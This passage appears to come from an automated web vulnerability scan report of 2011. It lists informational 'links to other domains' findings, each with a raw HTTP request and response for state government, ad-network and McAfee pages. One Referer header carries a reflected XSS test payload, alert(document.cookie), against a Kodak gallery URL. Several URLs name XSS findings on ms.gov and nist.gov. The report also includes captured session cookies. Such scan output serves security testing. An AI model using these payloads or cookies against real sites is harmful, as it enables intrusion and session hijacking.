<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://thomas.loc.gov/>Laws</a><br>
&nbsp;<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.treas.gov/offices/economic-policy/monitoring_economies.shtml>National Economy</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nccommerce.com/en/BusinessServices/SupportYourBusiness/FindDatawithEDIS/>Economic Development</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncesc.com/lmi/default.asp?init=true>Labor Market Information</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www2.fdic.gov/SDI/SOB/>Banking</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.eeoc.gov/stats/enforcement.html>EEO</a><br>
&nbsp;<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.bea.gov/>Economic Accounts - BEA</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://smpbff2.dsd.census.gov/TheDataWeb_HotReport/servlet/HotReportEngineServlet?reportid=69e0bef98ff0710dd175f5eb21bf9491&emailname=whazard@census.gov&filename=ed_home.hrml>Economic Development HotReport</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=https://www.esa.doc.gov/ei.cfm>Economic Indicators - ESA</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.dol.gov/dol/stats.htm>Labor Statistics</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.mbda.gov/minoritybizfacts/>Minority Businesses</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.sba.gov/advo/research/>Small Businesses</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.nass.usda.gov/Data_and_Statistics/Quick_Stats/index.asp>Agriculture</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncdot.org/transit/bicycle/safety/research_survey.html>Bicycling and Walking</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncdot.org/transit/transitnet/>Public Transit</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ncdot.org/maps/>Road Maps</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.faa.gov/data_statistics/>Aviation</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.transtats.bts.gov/>Transportation</a>
...[SNIP]...
<img src=http://www.osbm.state.nc.us/osbm/osbm_button_orange.gif width=9 height=9 border=0>&nbsp;
<a href=http://www.ntsb.gov/Info/info.htm>Transportation Safety</a>
...[SNIP]...
<li class="noborder"><a href="http://www.ncgov.com/" title="State of North Carolina Website">State of North Carolina Website</a>
...[SNIP]...

19.5. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /activityi;src=2624116;type=non-s657;cat=unive451;ord=2089402840938.4192? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; _msuuid_4561iuf9g3q501317=389E4AAF-0A51-4C2B-B96D-B96D82DE5465; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Sat, 30 Apr 2011 15:08:25 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2415

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://secure.leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=kodlb_cs=1&betq=12537=430993" width = "1" height = "1" border = "0"><img src="https://pix04.revsci.net/H07710/b3/0/3/noscript.gif?D=DM_EVT%3DCSM_Kodak_JP" height="1" width="1"/><script type="text/javascript">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1017311490/?label=oRVkCPaQ0wEQguKL5QM&amp;guid=ON&amp;script=0"/>
</div>
</noscript><img src="http://ad.yieldmanager.com/pixel?id=1074688&t=2" width="1" height="1" /><img src="https://b.collective-media.net/seg/eons/4akx" width="1" height="1" /><img src="https://secure.33across.com/ps/?pid=157&amp;cgn=13619"style="visibility:hidden;width:1px;height:1px;"><img src="https://udmserve.net/udm/fetch.tg?ev35=a;dt=3;" style="display: none;" border="0" height="1" width="1" alt="Underdogmedia"/><img src='https://a.rfihub.com/ca.gif?rb=571&ca=20472360&ct=898461237' height=0 width=0 style='display:none' alt='Rocket Fuel'/><img width="1" height="1" src="https://secure.media6degrees.com/orbserv/hbpix?pixId=3950&pcv=49" /><img height="1" width="1" src="https://view.atdmt.com/action/mmn_kodak_homepage"/><img src="https://secure.fastclick.net/w/tre?ad_id=22729;evt=16785;cat1=20623;cat2=20624;rand=898461237 width="1" height="1" border="0"><img src='http://pixel.mathtag.com/event/img?mt_id=101452&mt_adid=100283&v1=&v2=&v3=&s1=&s2=&s3=&ord=898461237' width='1' height='1' /><img src="http://ad.dedicatedmedia.com/seg?add=106496&t=2" width="1" height="1" /><img src="http://ib.adnxs.com/seg?add=108801&t=2" width="1" height="1" />
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1032613984/?label=gElpCJqMvAIQ4OCx7AM&amp;guid=ON&amp;script=0"/></body>
...[SNIP]...

19.6. http://ga.gov/00/home/0,2061,4802,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ga.gov
Path:   /00/home/0,2061,4802,00.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /00/home/0,2061,4802,00.html;jsessionid=E163D8F13AEF17647444D0A429B79A87 HTTP/1.1
Host: ga.gov
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=E163D8F13AEF17647444D0A429B79A87; vgnvisitor=2w45tg00s3c00001jrJkq8F01b

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 00:07:16 GMT
Server: Apache/1.3.29 (Unix)
Content-Type: text/html
Content-Length: 27652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang=
...[SNIP]...
<![endif]-->


<link rel="alternate" type="application/rss+xml" title="Georgia.Gov - Headlines [RSS]" href="http://www.georgia.gov/rss/headlines.xml" />
<script src="http://www.surveymonkey.com/jsPop.aspx?sm=S76tDGCVR8qVtlppre7tsA_3d_3d"> </script>
...[SNIP]...
<li><a href="https://services.georgia.gov/dhr/cspp/do/public/Welcome;jsessionid=cf0d1e9e75a08ffffffffc5d3c9e28e6400d:ymHt" target="_blank">Child Support Services</a>
...[SNIP]...
<li><a href="http://www.dol.state.ga.us/js/job_info_system.htm" target="_blank">Job Search</a>
...[SNIP]...
<li><a href="http://www.forms.georgia.gov/" target="_self">Government Forms</a>
...[SNIP]...
<img src="/gta/images/webpage/facebook.gif" alt="facebook" /><a href="http://www.new.facebook.com/pages/georgiagov/29760668054" title="georgia.gov on Facebook" target="_new">Facebook</a>
...[SNIP]...
<img src="/gta/images/webpage/twitter.gif" alt="twitter" /><a href="http://twitter.com/georgiagov" title="georgia.gov on Twitter" target="_new">Twitter</a>
...[SNIP]...
<h3>georgia.gov Headlines
       <a href="http://georgia.gov/rss/ga-agency-news.rss">
           <img src="/gta/images/webpage/rss-tag.png" alt="Subscribe to RSS" />
...[SNIP]...
<li><a href="http://senatepress.net/sen-albers-to-participate-in-a-march-to-remember-the-holocaust.html" target="_new">
       Sen. Albers to Participate in a March to Remember the Holocaust</a>
...[SNIP]...
<li><a href="http://senatepress.net/statement-from-sen-mullis-on-storm-damage-in-northwest-georgia.html" target="_new">
       Statement from Sen. Mullis on Storm Damage in Northwest Georgia</a>
...[SNIP]...
<li><a href="http://gov.georgia.gov/00/press/detail/0,2668,165937316_165937374_170804004,00.html" target="_new">
       Deal to visit storm-damaged areas: Governor declares emergency in 12 additional counties, bringing total to 16</a>
...[SNIP]...
<li><a href="http://gbi.georgia.gov/00/press/detail/0,2668,67862954_67866877_170804045,00.html" target="_new">
       School Paraprofessional Arrested in Burke County</a>
...[SNIP]...
<li>
<a href="http://search1.georgia.gov/search?q=unclaimed+money&amp;restrict=&amp;sort=date%3AD%3AL%3Ad1&amp;output=xml_no_dtd&amp;fpDocCount=&amp;fpStatus=live&amp;ie=UTF-8&amp;lr=&amp;client=georgia&amp;site=georgia&amp;oe=&amp;proxystylesheet=georgia&amp;fpViewPage=Search_Results">Unclaimed Money</a>
...[SNIP]...
<li><a href="http://search1.georgia.gov/search?ie=&amp;site=georgia&amp;output=xml_no_dtd&amp;client=georgia&amp;lr=&amp;proxystylesheet=georgia&amp;oe=&amp;restrict=&amp;fpViewPage=Search+Results&amp;fpStatus=live&amp;fpDocCount=&amp;q=employment">Employment</a>
...[SNIP]...
<li>
<a href="http://search1.georgia.gov/search?ie=&amp;site=georgia&amp;output=xml_no_dtd&amp;client=georgia&amp;lr=&amp;proxystylesheet=georgia&amp;oe=&amp;restrict=&amp;fpViewPage=Search+Results&amp;fpStatus=live&amp;fpDocCount=&amp;q=jobs">Jobs</a>
</li>

<li>
<a href="http://search1.georgia.gov/search?q=child+support&amp;restrict=&amp;btnG=Search&amp;sort=date%3AD%3AL%3Ad1&amp;output=xml_no_dtd&amp;fpDocCount=&amp;fpStatus=live&amp;ie=UTF-8&amp;lr=&amp;client=georgia&amp;site=georgia&amp;oe=&amp;proxystylesheet=georgia&amp;fpViewPage=Search_Results">Child Support</a>
...[SNIP]...
</a>
       <a href="http://www.connect.georgia.gov" title="1.800.georgia.gov" target="_new"
       onclick="var s=s_gi('georgiagovprod');s.tl(this,'o','GeorgiaGov - HOME PAGE 1.800.georgia.gov Graphic');">
<img src="/gta/images/webpage/1800gagrey.jpg" width="180" height="75" alt="1.800.georgia.gov" />
...[SNIP]...
<li><a href="http://www.legis.state.ga.us" >State Legislature</a>
...[SNIP]...
<li><a href="http://gov.georgia.gov/" >Governor Nathan Deal</a>
...[SNIP]...
<li><a href="http://www.georgia.gov/00/topic_index_channel/0,2398,4802_937045,00.html" >Agencies & Organizations</a>
...[SNIP]...
</a> |

<a href="http://www.georgia.gov/gta/translate/0,2678,4802,00.html?dname=www.georgia.gov/00/home/0,,4802,00.html&sName=georgia.gov">Espa&#0241;ol</a> |

<a href="http://connect.georgia.gov/">Contact 1.800.georgia</a>
...[SNIP]...
<div class="stats">
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

19.7. http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://georgiawildlife.dnr.state.ga.us
Path:   /content/displaynavigation.asp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /content/displaynavigation.asp?TopCategory=12 HTTP/1.1
Host: georgiawildlife.dnr.state.ga.us
Proxy-Connection: keep-alive
Referer: http://www.georgia.gov/external/?url=http://georgiawildlife.dnr.state.ga.us/content/displaynavigation.asp?TopCategory=12
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Object moved
Date: Sat, 30 Apr 2011 00:59:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.georgiawildlife.com
Content-Length: 151
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCRQTQAT=KJGJOMPAMFOPGFPGLKBJHMCE; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.georgiawildlife.com">here</a>.</body>

19.8. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304220485&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F30%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-www.ms.gov_80.htm&dt=1304202574659&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304202574666&frm=0&adk=1819763764&ga_vid=1646317461.1304202575&ga_sid=1304202575&ga_hid=2101324990&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=998&bih=935&fu=0&ifi=1&dtd=12&xpc=Oc7PLa4MlJ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 22:29:13 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12349

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-www.ms.gov_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.itt-tech.edu%26adT%3DC%2BFor%2BLinux%26adU%3Dqualysguard.qualys.com%26adT%3DVulnerability%2BScan%26gl%3DUS&amp;usg=AFQjCNF0o3HxhUQRNcRhTsf25oOn02nUOg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.9. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304220270&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F30%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html&dt=1304202296534&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304202297631&frm=0&adk=1607234649&ga_vid=2144067088.1304202299&ga_sid=1304202299&ga_hid=1572867467&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=982&bih=919&fu=0&ifi=1&dtd=2466&xpc=z7ZdXAVapK&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 22:24:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4340

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-nistgov.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DSeaEagle.com%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGd27OJ9BF44OFP8Y0kxSqXpitIsg" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...

19.10. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1304220568&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F30%2Fdork%2Freflected-xss-cross-site-scripting-cwe79-capec86-ghdb-www.ms.gov_80.htm&dt=1304202568971&bpp=4&shv=r20110427&jsv=r20110427&correlator=1304202568977&frm=0&adk=1819763764&ga_vid=651511704.1304202569&ga_sid=1304202569&ga_hid=1967913101&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=998&bih=935&fu=0&ifi=1&dtd=16&xpc=wDMzXJdyQS&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 30 Apr 2011 22:29:07 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13021

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/30/dork/reflected-xss-cross-site-scripting-cwe79-capec86-ghdb-www.ms.gov_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Moxiesoft.com%26adT%3DKnowledge%2BBase%2BSoftware%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BNetwork%2BSecurity%26adU%3Dvulnerability.scan.qualys.com%26adT%3DWireless%2BVulnerability%26gl%3DUS&amp;usg=AFQjCNHv3_y0hiTnKcjN-GgRj0xPFIRgQA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

19.11. http://home.mcafee.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.mcafee.com
Path:   /Default.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Default.aspx?culture=ES-AR HTTP/1.1
Host: home.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27mcafee%27%2C%271304109967310%27%5D%5D; lBounceURL=http://home.mcafee.com/secure/cart/; langid=1; HRntm=aff=0-0&cur=56&cid=86873&ct=1&lbu=http%3a%2f%2fhome.mcafee.com%2fsecure%2fcart%2f&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&ps=0869fcca3582e1333c8c705fde71a6b35b42445a53040511&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; AffID=0-0; CookieInformation=locale=us; s_sq=%5B%5BB%5D%5D; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=86873; s_campaign=78228; CampaignId=86873; s_cc=true; HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=EN-US; IscartemptySiteidAffid=no-1-0; s_nr=1304109967309-New; s_vi=[CS]v1|26DD91D7051D181F-60000106600003DE[CE]; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a++%3cOrganicSearchtraffic%3e1%3c%2fOrganicSearchtraffic%3e%0d%0a++%3cwt_source_cid%3e86873%3c%2fwt_source_cid%3e%0d%0a++%3cwt_destination_cid%3e86873%3c%2fwt_destination_cid%3e%0d%0a++%3cBasketflowid%3e0%3c%2fBasketflowid%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: s_vi=; path=/
Set-Cookie: s_nr=; path=/
Set-Cookie: s_cc=; path=/
Set-Cookie: CampaignId=; path=/
Set-Cookie: s_campaign=; path=/
Set-Cookie: SessionInfo=; path=/
Set-Cookie: s_sq=; path=/
Set-Cookie: CookieInformation=; path=/
Set-Cookie: lBounceURL=; path=/
Set-Cookie: s_ev8=; path=/
Set-Cookie: session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a%3c%2fSessionData%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: SiteID=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: lng=; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: langid=96; domain=mcafee.com; expires=Mon, 29-Apr-2041 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: SessionInfo=AffiliateId=0&CampaignId=86873; path=/
Set-Cookie: lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Locale=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: HPrst=gu=65a488fe-5ba0-4de1-b3b4-ed8103de2143&loc=ES-AR; domain=mcafee.com; expires=Thu, 29-Apr-2021 21:18:55 GMT; path=/; HttpOnly
Set-Cookie: AffID=0-0; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: Currency=62; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: HRntm=aff=0-0&cur=62&piacct=l5hppVF9ZAZqvcqlqqTxbw%3d%3d&cid=86873&ct=1&pfl=UjYffYeSjxhItgwf9DZxCQ%3d%3d&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&isr=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; domain=mcafee.com; path=/; HttpOnly
Set-Cookie: IscartemptySiteidAffid=no-1-0; domain=mcafee.com; path=/
X-Powered-By: ASP.NET
MS: SJV2
X-UA-Compatible: IE=8
Date: Fri, 29 Apr 2011 21:18:55 GMT
Content-Length: 34453
